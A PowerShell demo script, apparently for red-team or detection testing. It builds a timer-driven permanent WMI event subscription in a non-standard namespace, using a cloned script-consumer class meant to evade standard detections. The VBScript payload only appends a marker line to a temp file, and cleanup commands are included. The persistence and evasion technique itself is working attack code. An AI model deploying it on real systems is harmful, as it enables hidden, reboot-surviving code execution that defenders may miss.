WMIEvasionDemo.ps1
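<#
.SYNOPSIS
    Demo: permanent WMI event subscription built from a cloned event-consumer
    class in a non-standard namespace.

.DESCRIPTION
    Creates the four pieces of a timer-driven permanent WMI event subscription
    (persistence; MITRE ATT&CK T1546.003):

      __IntervalTimerInstruction        raises a __TimerEvent every 5 s
      __EventFilter                     WQL query matching that timer event
      NotAnActiveScriptEventConsumer    runs the VBScript payload
      __FilterToConsumerBinding         ties the filter to the consumer

    Everything lives in $TargetNamespace (root/Foo) instead of the usual
    root\subscription, and the consumer class is NotAnActiveScriptEventConsumer
    rather than the built-in ActiveScriptEventConsumer. The evident intent is to
    sidestep detections keyed on the standard namespace / class name.
    NOTE(review): whether your EDR, WMI-Activity or Sysmon WMI telemetry covers
    custom namespaces and cloned consumer classes is not established by this
    script — verify that before relying on it from either side.

    This script does NOT create root/Foo or the NotAnActiveScriptEventConsumer
    class; both must already exist (presumably from a setup step elsewhere in
    the repository — confirm). Writing instances to the WMI repository normally
    requires local administrator rights.

    The payload appends one line to C:\Windows\Temp\wmifiledrop.txt each time it
    fires, recording the account it ran under and the time, so the marker file
    keeps growing until the subscription is removed.

.NOTES
    Cleanup — the subscription persists across reboots until these are removed.
    The binding is matched via its referenced filter name so only this demo's
    objects are touched:

      Get-CimInstance -Namespace root/Foo -ClassName __FilterToConsumerBinding |
          Where-Object { $_.Filter.Name -eq 'TimerTrigger' } | Remove-CimInstance
      Get-CimInstance -Namespace root/Foo -ClassName NotAnActiveScriptEventConsumer -Filter "Name = 'ExecuteFileDropper'" | Remove-CimInstance
      Get-CimInstance -Namespace root/Foo -ClassName __EventFilter -Filter "Name = 'TimerTrigger'" | Remove-CimInstance
      Get-CimInstance -Namespace root/Foo -ClassName __IntervalTimerInstruction -Filter "TimerId = 'PayloadTrigger'" | Remove-CimInstance
#>

$TargetNamespace = 'root/Foo'

# Fail fast if the cloned consumer class is missing. Without this check the
# consumer step would leave $Consumer as $null and the binding step would throw
# a far less obvious error — after the timer and filter had already been
# written to the repository.
$null = Get-CimClass -Namespace $TargetNamespace -ClassName NotAnActiveScriptEventConsumer -ErrorAction Stop

# VBScript executed by the consumer on every matching event. It opens the
# marker file for append (mode 8, create if missing, ASCII) and writes the
# account name reported by WScript.Network plus the current time.
$VBScriptPayload = @"
Option Explicit
Dim strUser, strFileTargetPath, objFSOTarget, objFilesTarget
strUser = CreateObject("WScript.Network").UserName
strFileTargetPath = "C:\Windows\Temp\wmifiledrop.txt"
Set objFSOTarget = CreateObject("scripting.filesystemobject")
Set objFilesTarget = objFSOTarget.OpenTextFile(strFileTargetPath,8,True,0)
objFilesTarget.WriteLine "Payload executed as " & strUser & " at: " & now
objFilesTarget.Close
"@

# Timer: raises a __TimerEvent carrying TimerID 'PayloadTrigger'.
$TimerArgs = @{
    IntervalBetweenEvents = ([UInt32] 5000) # milliseconds between events
    SkipIfPassed          = $False
    TimerId               = 'PayloadTrigger'
}
$Timer = New-CimInstance -Namespace $TargetNamespace -ClassName __IntervalTimerInstruction -Property $TimerArgs -ErrorAction Stop

# Filter: WQL query that matches only our timer's events.
$EventFilterArgs = @{
    EventNamespace = $TargetNamespace
    Name           = 'TimerTrigger'
    Query          = 'SELECT * FROM __TimerEvent WHERE TimerID = "PayloadTrigger"'
    QueryLanguage  = 'WQL'
}
$Filter = New-CimInstance -Namespace $TargetNamespace -ClassName __EventFilter -Property $EventFilterArgs -ErrorAction Stop

# Consumer: the cloned class is assumed to mirror ActiveScriptEventConsumer's
# properties (ScriptingEngine, ScriptText, KillTimeout in seconds) — confirm
# against the class definition if it was altered.
$ActiveScriptEventConsumerArgs = @{
    Name            = 'ExecuteFileDropper'
    ScriptingEngine = 'VBScript'
    ScriptText      = $VBScriptPayload
    KillTimeout     = [UInt32] 45
}
$Consumer = New-CimInstance -Namespace $TargetNamespace -ClassName NotAnActiveScriptEventConsumer -Property $ActiveScriptEventConsumerArgs -ErrorAction Stop

# Emit the consumer instance for inspection (kept from the original script).
$Consumer

# Binding: Filter and Consumer are reference-typed properties, hence [Ref].
$FilterToConsumerArgs = @{
    Filter   = [Ref] $Filter
    Consumer = [Ref] $Consumer
}
$FilterToConsumerBinding = New-CimInstance -Namespace $TargetNamespace -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs -ErrorAction Stop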